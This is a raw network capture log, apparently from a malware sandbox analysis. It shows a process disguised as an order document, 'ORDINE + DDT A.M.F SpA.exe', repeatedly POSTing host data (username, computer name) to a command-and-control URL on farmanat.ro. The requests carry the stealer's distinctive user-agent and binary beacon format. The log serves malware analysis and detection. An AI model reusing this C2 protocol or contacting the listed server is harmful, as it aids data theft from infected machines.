Nov 25, 2021 10:54:06.473005056 CET	7293	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:06.506829023 CET	7293	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:06.556282043 CET	7294	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
707	192.168.11.20	50555	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:06.918600082 CET	7294	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:06.951936007 CET	7294	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:07.002161026 CET	7295	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
708	192.168.11.20	50556	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:07.389478922 CET	7296	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:07.423141956 CET	7296	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:07.487277985 CET	7296	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
709	192.168.11.20	50557	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:07.893918037 CET	7297	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:07.928214073 CET	7297	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:07.983906984 CET	7298	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
71	192.168.11.20	49907	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:45.989299059 CET	6408	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:46.023303032 CET	6408	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:46.079950094 CET	6408	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
710	192.168.11.20	50558	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:08.406130075 CET	7298	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:08.439901114 CET	7298	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:08.498502970 CET	7299	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
711	192.168.11.20	50559	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:08.906487942 CET	7300	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:08.940051079 CET	7300	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:08.998106003 CET	7300	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
712	192.168.11.20	50560	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:09.414303064 CET	7301	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:09.448623896 CET	7301	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:09.501857996 CET	7301	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
713	192.168.11.20	50561	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:09.910267115 CET	7302	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:09.943825006 CET	7302	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:09.999290943 CET	7303	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
714	192.168.11.20	50562	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:10.396250963 CET	7304	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:10.430008888 CET	7304	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:10.480978966 CET	7304	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
715	192.168.11.20	50563	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:10.902122974 CET	7305	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:10.935837984 CET	7305	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:10.993756056 CET	7305	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
716	192.168.11.20	50564	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:11.424071074 CET	7306	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:11.457566977 CET	7306	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:11.508637905 CET	7307	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
717	192.168.11.20	50565	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:11.949253082 CET	7308	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:11.983292103 CET	7308	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:12.037087917 CET	7308	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
718	192.168.11.20	50566	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:12.442909956 CET	7309	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:12.477206945 CET	7309	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:12.526679039 CET	7309	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
719	192.168.11.20	50567	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:12.904803038 CET	7310	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:12.938934088 CET	7310	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:12.995860100 CET	7311	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
72	192.168.11.20	49908	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:46.527621031 CET	6409	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:46.561898947 CET	6409	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:46.613563061 CET	6409	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
720	192.168.11.20	50568	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:13.432565928 CET	7311	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:13.466087103 CET	7312	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:13.516068935 CET	7312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
721	192.168.11.20	50569	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:13.930896044 CET	7313	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:13.964442015 CET	7313	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:14.014487982 CET	7313	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
722	192.168.11.20	50570	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:14.436252117 CET	7314	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:14.470554113 CET	7314	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:14.520673990 CET	7315	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
723	192.168.11.20	50571	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:14.939599991 CET	7315	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:14.973181963 CET	7316	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:15.023457050 CET	7316	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
724	192.168.11.20	50572	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:15.422755957 CET	7317	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:15.456079006 CET	7317	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
